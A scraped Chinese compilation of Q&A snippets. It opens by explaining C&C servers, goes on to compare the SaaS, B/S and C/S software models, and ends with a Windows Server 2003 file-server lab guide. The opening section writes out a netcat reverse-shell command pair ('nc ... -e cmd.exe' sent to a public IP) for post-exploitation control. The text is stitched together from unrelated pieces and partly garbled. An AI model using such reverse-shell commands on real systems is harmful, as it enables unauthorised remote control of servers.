什么是C&C服务器

C&C 服务器的全称是 Command and Control Server，翻译过来就是命令和控制服务器

通常在做渗透测试的时候，在拿到一个 webshell 的时候，需要对服务器进行提权 *** 作，如果是一台 windows 的服务器，提权的时候通常是利用本地提权漏洞的 exp 进行溢出提权，有些 exp 可以直接在后面加参数，溢出成功之后执行参数中的命令。

而有的 exp 溢出成功之后是返回一个 system 权限的 cmd，这时就需要将低权限的 cmd shell 反d回本地，这里用 nc 在本地执行：nc -vv -lp 3333

上述命令的意思是在本地监听一个 3333 端口等待连接，假设电脑 IP 是公网的，并且 IP 为 114.114.114.114，然后在目标服务器就可以执行：nc 114.114.114.114 3333 -e cmd.exe

上面的命令就可以把远程服务器的服务器权限的 cmd shell 返回到本地，这时你就可以通过 nc 建立的这个 shell 进行通信，发送你要执行的命令，在远程服务器接收到命令之后执行并将结果返回，这时本机电脑就是一个简易的 C&C 服务器。

扩展资料：

C&C 服务器使目标机器可以接收来自服务器的命令，从而达到服务器控制目标机器的目的。该方法常用于病毒木马控制被感染的机器。

通常只有这样内网的服务器才可以访问进行连接，所以可以使用一台中转服务器，这台中转服务器有一个公网 IP 地址是：111.111.111.111，这样不管是目标服务器还是我们本机都可以访问这台中转服务器。

这里中转服务器的作用就是本地内网的主机监听的端口映射到公网 IP 的某个端口，这样目标机访问中转服务器监听的端口就相当于访问了我们本地监听的端口。

如何区分SaaS，B/S，C/S三种不同模式软件

软件是不是你自己写的，如果是，就不是SaaS。

如果是你自己写的，用浏览器访问？ 有后台？ 如果是， B/S

如果是你自己写的，不用浏览器访问，有后台，有客户端，就是 c/s

SaaS、B/S、C/S三种不同模式软件的区别

SaaS是Sofare-as-a-service（软件即服务），是一种随着互联网技术的发展和应用软件的成熟，提供基于互联网的全新的软件服务模式。SaaS提供商为企业搭建信息化所需要的所有网络基础设施及软件、硬件运作平台，并负责所有前期的实施、后期的维护等一系列服务，企业无需购买软硬件、建设机房、招聘IT人员，即可通过互联网使用信息系统。就像打开自来水龙头就能用水一样，企业根据实际需要，向SaaS提供商租赁软件服务。

SaaS软件是继C/S架构软件（Client/Server即客户/服务器，用户端需要安装专用的客户端软件，企业需要部署服务器），和传统B/S架构软件（Brower/Server即浏览器/服务器，用户端上只要安装一个浏览器，企业内部部署服务器）之后，为企业在线提供按需服务的软件应用服务模式（用户端也是采用浏览器，但企业无需部署服务器）。SaaS软件目前已成为软件产业的一个重要力量，是软件科技发展的趋势。目前来说，龙头企业是北森。北森是中国最大的SaaS人才管理软件云服务供应商，拥有国内唯一覆盖人才测评、招聘管理、绩效管理、继任与发展、360度评估反馈、员工调查等业务的一体化人才管理软件平台。历经10余年，北森服务了4500余家企业、上千万员工，日处理十余万人才数据，已成为国内人才测评、招聘管理系统和继任管理系统领域的绝对领导者。

在管理软件的范畴里，C/S和B/S两种模式，哪种好一些？

近两年来，对于B/S、C/S两种结构的软件的优劣，国内基本已经达成共识，普遍认为B/S结构软件将全面取代C/S结构软件。　C/S结构软件（即客户机/服务器模式）分为客户机和服务器两层，客户机不是毫无运算能力的输入、输出设备，而是据有了一定的数据处理和数据存储能力，通过把应用软件的计算和数据合理地分配在客户机和服务器两端，可以有效地降低网络通信量和服务器运算量。由于服务器连接个数和数据通信量的限制，这种结构的软件适于在用户数目不多的局域网内使用。国内目前的大部分ERP（财务）软件产品即属于此类结构。

B/S(浏览器/服务器模式)是随着Inter技术的兴起，对C/S结构的一种改进。在这种结构下，软件应用的业务逻辑完全在应用服务器端实现，用户表现完全在Web服务器实现，客户端只需要浏览器即可进行业务处理，是一种全新的软件系统构造技术。这种结构更成为当今应用软件的首选体系结构。

1，数据安全性比较。由于C/S结构软件的数据分布特性，客户端所发生的火灾、盗抢、地震、病毒、黑客等都成了可怕的数据杀手。另外，对于集团级的异地软件应用，C/S结构的软件必须在各地安装多个服务器，并在多个服务器之间进行数据同步。如此一来，每个数据点上的数据安全都影响了整个应用的数据安全。所以，对于集团级的大型应用来讲，C/S结构软件的安全性是令人无法接受的。对于B/S结构的软件来讲，由于其数据集中存放于总部的数据库服务器，客户端不保存任何业务数据和数据库连接信息，也无需进行什么数据同步，所以这些安全问题也就自然不存在了。

2，数据一致性比较。在C/S结构软件的解决方案里，对于异地经营的大型集团都采用各地安装区域级服务器，然后再进行数据同步的模式。这些服务器每天必须同步完毕之后，总部才可得到最终的数据。由于局部网络故障造成个别数据库不能同步不说，即使同步上来，各服务器也不是一个时点上的数据，数据永远无法一致，不能用于决策。对于B/S结构的软件来讲，其数据是集中存放的，客户端发生的每一笔业务单据都直接进入到中央数据库，不存在数据一致性的问题。

3，数据实时性比较。在集团级应用里，C/S结构不可能随时随地看到当前业务的发生情况，看到的都是事后数据；而B/S结构则不同，它可以实时看到当前发生的所有业务，方便了快速决策，有效地避免了企业损失。

4，数据溯源性比较。由于B/S结构的数据是集中存放的，所以总公司可以直接追溯到各级分支机构（分公司、门店）的原始业务单据，也就是说看到的结果可溯源。大部分C/S结构的软件则不同，为了减少数据通信量，仅仅上传中间报表数据，在总部不可能查到各分支机构（分公司、门店）的原始单据。

5，服务响应及时性比较。企业的业务流程、业务模式不是一成不变的，随着企业不断发展，必然会不断调整。软件供应商提供的软件也不是完美无缺的，所以，对已经部署的软件产品进行维护、升级是正常的。C/S结构软件，由于其应用是分布的，需要对每一个使用节点进行程序安装，所以，即使非常小的程序缺陷都需要很长的重新部署时间，重新部署时，为了保证各程序版本的一致性，必须暂停一切业务进行更新（即“休克更新”），其服务响应时间基本不可忍受。而B/S结构的软件不同，其应用都集中于总部服务器上，各应用结点并没有任何程序，一个地方更新则全部应用程序更新，可以做到快速服务响应。

6，网络应用限制比较。C/S结构软件仅适用于局域网内部用户或宽带用户（1兆以上）；而我们的B/S结构软件可以适用于任何网络结构（包括28.8K拨号入网方式），特别适于宽带不能到达的地方

C/S模式的软件

对，没有服务端做处理，要客户端做什么？

做成B/S结构多好？ 看是干什么用？

哪种软件用C/S方式,B/S方式,P2P方式?

c/s是指客户端与服务器交互，比如说QQ，豌豆荚，迅雷，快播，大型网游等

b/s是指浏览器与服务器交互，典型的有webQQ，微博，购物网站，论坛，网页游戏等。

1、 云计算机的计算模式为？（） A、 W/S B、 C/S C、 B/S D、 B/C

云计算是一个虚拟的计算资源池，它通过互联网提供给用户使用资源池内的计算资源，它代表了信息技术及其基础架构的发展方向，它的出现必将在不远的将来展示出强大的生命力，并将从多方面影响企业的发展。

质安通软件是b/s 还是c/s ?

建议用BS，BS维护方便、只要能上网可以再任何地方用 CS不具有这种优势，BS是大势所趋

什么模式是c/s、b/s和p2p计算

C/S是客户端/服务器模式。b/s是浏览器/服务器模式。P2P是点对点模式。

打个比方：c/s模式中，服务器（s）是大众情人。你们每个人(C)只能和她谈恋爱。

b/s模式中，服务器（s）还是大众情人。你们每个人必须使用固定工具（浏览器B）和她谈恋爱。

P2P模式，大家乱搞。

怎么看系统用的是B/S模式还是C/S模式？

C/S是Client/Server中文意思：客户端/服务器。

B/S是Brower/Server中文意思：浏览器/服务器。

理解以上两句话就好办了。

凡是通过浏览器运行的程序就是B/S。

需要下载到本地安装的程序就是C/S。

文件服务器模式与客户机/服务器模式（c/s)与浏览器模式（B/s）的异同

cs模式要求客户端必须要有相应的程序，来连接服务端

bs客户端只要有浏览器即可通过web访问服务器

他们对于网络依靠不同：cs一旦掉线必须重新启动程序才可，而bs则随时能连接上，对于 *** 作远程数据来讲cs要比bs慢好多啊。

cs的进程锁好烦人的，动不动就是被锁死，不能同时修改一条数据啊，bs的数据记录不像cs那样每个终端都可以装一个数据库来记录， *** 作起来比较麻烦些

实验16 Windows环境下的文件服务器配置2007年06月12日 星期二 上午 09:001 实验目的与要求

(1) 学会安装和配置文件服务器。

(2) 学会服务器端共享文件夹的配置和管理。

(3) 学会客户端访问共享文件夹的方法。

(4) 学会分布式文件系统的设置方法。

(5) 实验学时：2

2 实验相关理论与知识

计算机网络的基本功能是在计算机间共享信息，文件共享可以说是最基本、最普遍的一种网络服务。虽然越来越多的用户购置专用文件服务器(如NAS)，但是通用 *** 作系统提供的文件服务器功能也非常实用，完全能满足一般的文件共享需求，下面主要介绍Windows Server 2003文件服务器的配置、管理和应用。

文件服务器负责共享资源的管理和传送接收，管理存储设备(硬盘、光盘、磁带)中的文件，为网络用户提供文件共享服务，也称文件共享服务器。除了文件管理功能之外，文件服务器还要提供配套的磁盘缓存、访问控制、容错等功能。部署文件服务器，主要要考虑以下3个因素。

·存取速度：快速存取服务器上的文件，例如可提供磁盘缓存加速文件读取。

·存储容量：要有足够的存储空间以容纳众多网络用户的文件，可使用磁盘阵列。

·安全措施：实现网络用户访问控制，确保文件共享安全。

文件服务器主要有两类解决方案，一类是专用文件服务器，另一类是使用PC服务器或PC计算机组建的通用文件服务器。

专用文件服务器是专门设计成文件服务器的专用计算机，以前主要是运行 *** 作系统、提供网络文件系统的大型机、小型机，现在的专用文件服务器则主要指具有文件服务器的网络存储系统，如NAS和 SAN。NAS独立于 *** 作系统平台，可支持多种 *** 作系统和网络文件系统，提供集中化的网络文件服务器和存储环境，比一般的文件服务器的功能更强大，可看作是专用存储服务器，可为那些访问和共享大量文件系统数据的用户提供高效、性能价格比优异的解决方案。SAN全称存储区域网络，是一种用户存储服务的特殊网络，通常由磁盘阵列、光盘库、磁带库和光纤交换机组成。NAS可作为独立的文件服务器，提供文件级的数据访问功能，更适合文件共享。而SAN提供数据块级的数据访问功能，更适合数据库和海量数据。

目前一般用户使用PC服务器或PC计算机，通过网络 *** 作系统来提供文件服务，UNIX、Linux、Novell、 Windows等 *** 作系统都可提供文件共享服务。Windows网络 *** 作系统，如Windows NT Server、Windows2000 Server和最新的Windows Server 2003由于 *** 作管理简单、功能强大，在中小用户群中的普及率非常高，许多文件服务器都运行Windows网络 *** 作系统。下面将重点以Windows Server 2003为例介绍文件服务器的配置、管理和应用。

3 实验环境与设备

C/S模式的网络环境，包括一台Windows XP客户机和一台Windows Server 2003服务器。

两种可选的物理拓扑（交叉线连接或通过集线器/交换机用直连线连接）。

4 实验内容与步骤

4.0 服务器的基本网络配置，包括IP地址为“192.168.105.XX”、网关为“192.168.105.254”等。(注：“XX”代表你配置机器的主机编号，“nXX”代表你的服务器主机名，例如你坐在5号机上则“XX”代表“05”，“1XX”代表“105”，配置此机的IP地址为“192.168.105.5”、主机名为“n05”，下同)。

4.1 安装和配置文件服务器

文件服务器提供网络上的中心位置，可供存储文件并通过网络与用户共享文件。当用户需要重要文件时，可以访问文件服务器上的文件，而不必在各自独立的计算机之间传送文件。如果网络用户需要对相同文件和可通过网络访问的应用程序的访问权限，就要将该计算机配置为文件服务器。默认情况下，在安装Windows Server 2003系统时，将自动安装“Microsoft网络的文件和打印共享”网络组件。如果没有该组件，可通过网络连接属性对话框安装。

1．准备工作

在部署文件服务器之前，应当做好以下准备工作。

·划出专门的硬盘分区(卷)用于提供文件共享服务，而且要保证足够的存储空间，必要时使用磁盘阵列。

·磁盘分区(卷)使用NTFS文件系统，因为FAT32缺乏安全性，而且不支持文件和文件夹压缩、磁盘配额、文件加密或单个文件权限等重要特性。

提示：使用Windows Server 2003自带的工具即可将FAT32转换成NTFS格式。该工具名为Convert.exe，位于Windows安装目录下的System32目录中。在命令行状态运行该工具即可，如Convert E:/FS:NTFS。

·确定是否要启用磁盘配额，以限制用户使用的磁盘存储空间。

·确定是否要使用索引服务，以提供更快速、更便捷的搜索服务。

2．配置文件服务器

只要将Windows Server 2003计算机上的某个文件夹共享出来，就会自动安装文件服务器，也可通过“配置您的服务器向导”工具来安装文件服务器角色。这两种方法的差别是，第二种方法提供更多的选项，并在程序菜单中提供文件服务器管理台工具。这里介绍采用第二种方法的基本步骤。

(1) 启动“配置您的服务器向导”工具。默认情况下，登录Windows Server 2003时将自动启动“管理您的服务器”(也可从控制面板中选择【管理工具】→【管理您的服务器】)，单击【添加或删除角色】。另一种方法是直接从控制面板中选择【管理工具】→【管理您的服务器】→【配置您的服务器向导】。单击【下一步】按钮。

(2) 在【配置选项】界面中选择【自定义配置】，单击【下一步】按钮。

(3) 在【服务器角色】界面中，如果【文件服务器】的【已配置】状态为“否”，就单击【文件服务器】，然后单击【下一步】。

注意：如果【文件服务器】的【已配置】状态为“是”，就单击【文件服务器】，再单击【下一步】按钮打开【角色删除确认】界面，并选择【删除文件服务器角色】复选框，即可删除文件服务器角色，这样该服务器上的文件和文件夹就不再共享，依赖于这些共享资源的网络用户、程序或宿主都将无法与它们连接。

(4) 出现【文件服务器磁盘配额】对话框中，为服务器上所有NTFS分区设置默认的磁盘配额。勾选【为此服务器的新用户设置默认磁盘空间配额】和【拒绝将磁盘空间给超过配额限制的用户】。单击【下一步】按钮。默认情况下是没有启用磁盘配额。

(5) 出现【文件服务器索引服务】对话框，确定是否要使用索引服务。单击【下一步】按钮。一般情况下不需索引服务，只有在用户要经常搜索该服务器上的文件内容时才启用它。

(6) 出现【选择总结】对话框，查看和确认已经选择的选项，单击【下一步】按钮。

本例中有“设置默认磁盘配额”、“安装文件服务器管理”和“运行共享文件夹向导来添加一个新的共享文件夹或共享已有文件夹”等选项。

(7) 自动完成相关配置后，出现共享文件夹向导，根据提示配置共享文件夹以供其他用户共享。只有配置了共享文件夹之后，文件服务器才能建立。

(8) 单击【下一步】按钮，出现【文件夹路径】对话框，指定要共享的文件夹路径。可通过【浏览】在C盘目录下新建一个【FileShare】作为共享目录，此时【文件夹路径】输入框中将出现【C:\FileShare】（如果C盘中已经建立过此文件夹，才可以在此输入框中直接输入）。

(9)单击【下一步】按钮，出现【名称、描述和设置】对话框，指定共享名。

(10) 单击【下一步】按钮，出现【权限】对话框，指定共享权限为【管理员有完全访

问权限；其他用户有只读访问权限】，单击【完成】按钮。这里提供了几种预置的权限，也可以自定义权限。

(11)【共享成功】对话框中显示共享成功，给出新建共享文件夹的信息。如果要继续设置其他共享文件夹，则选中下面的复选框。单击【关闭】按钮，【完成】。

至此文件服务器配置就完成了。接下来可执行各项文件管理任务。

3．文件服务器管理工具（以下方法至少掌握一种）

Windows Server 2003提供了用于文件服务器配置管理的多种工具。

·文件服务器管理控制台：打开“管理您的服务器”工具，在【文件服务器】区域单击【管理此文件服务器】，打开该控制台。要使用“配置您的服务器向导”工具安装文件服务器，可从程序菜单中选择【管理工具】→【文件服务器管理】命令打开该控制台。

·“共享文件夹”管理工具：也可通过“计算机管理”工具中的“共享文件夹”管理工具来执行共享文件夹的配置管理，从程序菜单中选择【管理工具】→【计算机管理】，展开【共享文件夹】节点即可。

·Windows资源管理器：可直接将文件夹配置为共享文件夹。

·命令行工具：如net share可显示有关本地计算机上全部共享资源的信息。

---